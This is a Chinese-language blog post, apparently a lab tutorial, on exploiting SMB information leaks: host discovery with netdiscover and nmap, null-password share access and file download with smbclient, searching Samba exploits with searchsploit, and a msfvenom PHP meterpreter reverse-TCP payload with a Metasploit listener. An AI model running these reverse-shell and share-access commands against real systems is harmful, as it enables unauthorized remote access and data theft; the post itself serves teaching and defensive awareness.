当前位置：首页 > news >正文

SMB信息泄露的利用

news 文章来源：https://blog.csdn.net/Scalzdp/article/details/134457052 2025/4/27 0:15:44

一、背景

今天分享SMB信息泄露，SMB（Server Message Block）网络通信协议，早些时候被用于Web链接和客户端与服务器之间的信息通信，现在大部分Web页面使用HTTP协议，在web领域应用较少。另一方面SMB协议还是被广泛用于计算机之间共享文件、打印机、串口等信息通信，比如在windows操作系统上面的“网上邻居”的实现就是靠SMB实现的。
SMB 是一种客户机/服务器、请求/响应协议。通过 SMB 协议，客户端应用程序可以在各种网络环境下读、写服务器上的文件，以及对服务器程序提出服务请求。此外通过 SMB 协议，应用程序可以访问远程服务器端的文件、以及打印机等资源。
SMB 协议基于TCP - NETBIOS下的，一般端口使用 139,445

二、SMB泄露原理

SMB协议是一种客户端-服务器协议，尽管SMB协议在网络文件共享中起到重要作用，但它也有一些安全漏洞，使得系统容易受到攻击。以下是一些常见的SMB协议安全漏洞：
1.无法强制用户使用较强的密码：SMB协议在早期版本中没有强制要求用户使用强密码，这给攻击者破解密码提供了机会。比如使用弱密码暴力破解。
2.NTLM身份验证问题：NTLM（Windows NTLAN Manager）是SMB协议中使用的一种身份验证协议，它的早期版本在安全性方面存在一些漏洞。攻击者可以通过中间人攻击或暴力破解。
3.SMB协议版本问题：一些较早版本的SMB存在安全漏洞，用户可以在kali上通过searchsploit 找到对应版本的漏洞，已经响应的利用脚本。
4.缓冲区溢出：由于SMB协议没有对用户输入进行充分验证，攻击者可以通过发送特制的请求来触发缓冲区溢出，导致远程恶意代码执行。
既然SMB存在这些漏洞，接下来我们看一下如何一步步进行SMB漏洞的利用

三、SMB信息泄露利用步骤

进行SMB漏洞利用，主要还是要参考局域网靶机渗透操作指南，接下来我们看一下如何进行SMB漏洞利用：

3.1 寻找靶机

查看局域网中靶机的IP 使用工具为netdiscover工具，命令格式： netdiscover -r ip/mask

3.2 探测靶机开放的服务以及服务使用框架的版本

使用nmap工具，具体命令格式：nmap -sV 靶机ip

3.3 找到SMB协议，并针对协议进行分析

（a）针对SMB协议，使用空口令，若口令尝试登陆，并查看敏感文件
smbclinet -L IP //查看SMB文件目录，使用空口令尝试登陆
smbclient ‘\IP\share$’ //查看SMB文件，使用空密码，其中的share就是SMB列出的文件名称
get 敏感文件 //下载文件
（b）针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索SMB远程溢出漏洞

3.4 基于3.3找出漏洞的情况下，我们可以制作一些反弹Shell

主要利用metasploit这款工具，制作反弹shell
例如我制作的是PHP框架下的一个tcp反弹的webshell，使用的攻击载荷payload（php/meterpreter/reverse_tcp）：

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP lport=4444 -f raw

制作一个webshell并运行起来
然后攻击机启动metasploit，然后启动监听

msfconsole//启动metasploit
msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

只有有人触发了php框架下的反弹shell脚本，攻击机就会获得服务器的登录权限。

四、总结

SMB的协议出现较早，应用较广泛，但是早期计算机协议注重应用的快速建立，而对安全的要求并不太严格，所以很多较老的设备使用了存在漏洞的SMB协议，就会存在安全隐患。我们在SMB漏洞的利用中，主要还是基于msf提供的一些payload，这些payload其实都是别人做好了的，所以用起来特别方便，也从另一个方面反映如果有人要攻击利用SMB漏洞其实也很方便，所以我们在计算机安全防护上还需进行更多的考虑，必要的安全设置应该保留，不要为了一时方便，关闭所有安全防护的护盾。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟，如有写的不好的地方也请大家多多包涵。

SMB信息泄露的利用

一、背景

二、SMB泄露原理

三、SMB信息泄露利用步骤

3.1 寻找靶机

3.2 探测靶机开放的服务以及服务使用框架的版本

3.3 找到SMB协议，并针对协议进行分析

3.4 基于3.3找出漏洞的情况下，我们可以制作一些反弹Shell

四、总结

相关文章：

SMB信息泄露的利用

QT自定义信号,信号emit,信号参数注册

06.webpack性能优化--构建速度

11-15 周三 softmax 回归学习

React新手必懂的知识点

es为什么这么快

Pandas分组聚合_Python数据分析与可视化

VMware17虚拟机Linux安装教程(详解附图，带VMware Workstation 17 Pro安装）

基于SDN技术构建多平面业务承载网络

关于卓越服务的调研报告

ubuntu22.04换源

03. Python中的语句

Linux CentOS7 添加网卡

2311rust,到54版本更新

【linux】补充：高效处理文本的命令学习（tr、uniq、sort、cut）

Redis篇---第七篇

Shell脚本：Linux Shell脚本学习指南（第一部分Shell基础）一

长短期记忆（LSTM）与RNN的比较：突破性的序列训练技术

Swift 如何打造兼容新老系统的字符串分割（split）方法

JVM面试必备

战神传奇【我本沉默精修版】win服务端+双端+充值后台+架设教程

安卓手机投屏到电视，跨品牌、跨地域同样可以实现！

python变量名解析总结

端口号大揭秘：网络世界的“门牌号”有多牛？

vue解除数据双向绑定

组件插槽,生命周期,轮播图组件的封装,自定义指令的封装等详解以及axios的卖座案例

小美的树上染色

1.rk3588的yolov5运行：pt_onnx_rknn转换及rknn在rk3588系统python运行

适用于全部安卓手机的 5 大免费 Android 数据恢复

【案例分享】BenchmarkSQL 5.0 压测 openGauss 5.0.0